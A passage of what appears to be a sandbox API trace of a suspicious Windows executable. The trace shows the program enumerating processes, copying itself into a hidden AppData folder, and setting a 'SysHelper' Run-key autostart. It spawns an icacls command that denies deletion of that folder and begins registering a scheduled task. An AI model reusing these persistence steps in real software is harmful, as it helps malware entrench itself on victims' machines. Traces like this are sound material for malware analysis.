lpcbNeeded=0x18d690) returned 1 [0108.537] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x12f0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0108.537] CloseHandle (hObject=0x3ec) returned 1 [0108.537] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e0) returned 0x3ec [0108.538] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.539] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1100000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0108.539] CloseHandle (hObject=0x3ec) returned 1 [0108.539] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f0) returned 0x3ec [0108.539] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.541] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xdb0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="advertiser.exe") returned 0xe [0108.541] CloseHandle (hObject=0x3ec) returned 1 [0108.541] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa00) returned 0x3ec [0108.541] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.542] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x3c0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="harvard.exe") returned 0xb [0108.543] CloseHandle (hObject=0x3ec) returned 1 [0108.543] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa10) returned 0x3ec [0108.543] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.544] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xbe0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="av entering pound.exe") returned 0x15 [0108.544] CloseHandle (hObject=0x3ec) returned 1 [0108.544] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa20) returned 0x3ec [0108.544] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.546] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x10d0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="jerusalem_gibson.exe") returned 0x14 [0108.546] CloseHandle (hObject=0x3ec) returned 1 [0108.546] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa48) returned 0x0 [0108.546] CloseHandle (hObject=0x0) returned 0 [0108.546] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa9c) returned 0x0 [0108.546] CloseHandle (hObject=0x0) returned 0 [0108.546] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x0 [0108.546] CloseHandle (hObject=0x0) returned 0 [0108.546] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb0) returned 0x3ec [0108.546] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.548] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x400000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="1A3E.TMP.EXE.exe") returned 0x10 [0108.548] CloseHandle (hObject=0x3ec) returned 1 [0108.548] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x838) returned 0x0 [0108.548] CloseHandle (hObject=0x0) returned 0 [0108.548] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b8) returned 0x0 [0108.548] CloseHandle (hObject=0x0) returned 0 [0108.548] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x0 [0108.548] CloseHandle (hObject=0x0) returned 0 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x28) returned 0x719c18 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x74e748 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x754f90 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x7551f8 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x755460 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x7556c8 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x755930 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x755b98 [0108.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x755e00 [0108.559] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x756068 [0108.559] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x7562d0 [0108.565] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d690 | out: phkResult=0x18d690*=0x3ec) returned 0x0 [0108.565] RegQueryValueExW (in: hKey=0x3ec, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d68c, lpData=0x18bdb8, lpcbData=0x18d670*=0x400 | out: lpType=0x18d68c*=0x0, lpData=0x18bdb8*=0x0, lpcbData=0x18d670*=0x400) returned 0x2 [0108.565] RegCloseKey (hKey=0x3ec) returned 0x0 [0108.565] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0108.566] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0108.566] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" " [0108.566] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" ", pNumArgs=0x18d654 | out: pNumArgs=0x18d654) returned 0x7436c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" [0108.566] lstrcpyW (in: lpString1=0x18b5b8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" [0108.566] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe") returned="1A3E.TMP.EXE.exe" [0108.566] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18cdb8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0108.567] UuidCreate (in: Uuid=0x18d604 | out: Uuid=0x18d604) returned 0x0 [0108.567] UuidToStringW (in: Uuid=0x18d604, StringUuid=0x18d698 | out: StringUuid=0x18d698) returned 0x0 [0108.567] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x50) returned 0x7366c8 [0108.567] RpcMgmtStatsVectorFree (in: StatsVector=0x18d698 | out: StatsVector=0x18d698) returned 0x0 [0108.567] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="e6fbab59-e809-4a2f-bfd3-cab0a2218b41" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41") returned 1 [0108.567] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41"), lpSecurityAttributes=0x0) returned 1 [0108.569] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb0) returned 0x71e790 [0108.569] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb0) returned 0x74a570 [0108.569] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41", pMore="1A3E.TMP.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe") returned 1 [0108.569] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe")) returned 0 [0108.569] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe"), bFailIfExists=0) returned 1 [0108.600] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d694 | out: phkResult=0x18d694*=0x3fc) returned 0x0 [0108.600] lstrcpyW (in: lpString1=0x18c5b8, lpString2="\"" | out: lpString1="\"") returned="\"" [0108.600] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" [0108.600] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart" [0108.600] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart") returned 111 [0108.600] RegSetValueExW (in: hKey=0x3fc, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart", cbData=0xde | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart") returned 0x0 [0108.601] RegCloseKey (hKey=0x3fc) returned 0x0 [0108.601] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x751358 [0108.601] SetLastError (dwErrCode=0x0) [0108.601] lstrcpyW (in: lpString1=0x18a5b8, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0108.601] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41" [0108.601] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0108.601] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d5b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d614 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18d614*(hProcess=0x3ec, hThread=0x3fc, dwProcessId=0xae8, dwThreadId=0xb80)) returned 1 [0108.729] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.004] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.011] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.027] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.042] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.058] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.073] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.089] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.105] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.120] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.136] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.151] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.167] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.182] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.199] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.214] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.229] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.245] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.260] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.276] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.302] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.307] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.323] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.339] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.354] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.370] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.385] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.401] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.416] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.433] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.448] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.463] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.479] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.495] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.510] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.526] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.542] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.557] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.572] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.588] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.604] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.619] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.635] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.651] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.666] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.682] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.698] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.713] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.728] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.744] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.760] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.775] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.791] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.806] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.822] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.838] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.854] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.869] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.884] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.900] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.918] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.932] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.947] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.963] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0109.979] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.014] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.025] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.040] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.056] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.072] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.088] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.103] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.118] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.134] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.150] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.165] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.181] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.197] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.212] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.228] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.243] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.259] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.275] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.315] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.321] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.337] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.352] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.368] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.384] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.399] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.416] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.430] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.446] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.462] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.477] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.493] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.508] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.525] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.540] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.556] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.571] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.587] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.602] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.618] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.635] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.649] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.664] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.680] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.696] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.711] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.727] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.743] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.758] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.774] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.789] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.805] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.820] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.836] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.852] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.867] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.883] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.911] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.914] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.930] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.945] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.961] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x102 [0110.976] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1) returned 0x0 [0111.007] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x74a570 | out: hHeap=0x6f0000) returned 1 [0111.007] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7366c8 | out: hHeap=0x6f0000) returned 1 [0111.017] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x751430 [0111.027] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x751508 [0111.037] CoInitialize (pvReserved=0x0) returned 0x0 [0112.160] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0112.161] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x751790 [0112.161] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d67c | out: ppv=0x18d67c*=0x6efef0) returned 0x0 [0112.466] TaskScheduler:ITaskService:Connect (This=0x6efef0, serverName=0x18d108*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x67, varVal2=0xd0), user=0x18d118*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18d128*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18d138*(varType=0x0, wReserved1=0x75, wReserved2=0xd624, wReserved3=0x18, varVal1=0x420cab, varVal2=0x6f0000)) returned 0x0 [0112.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x756970 [0112.476] TaskScheduler:ITaskService:GetFolder 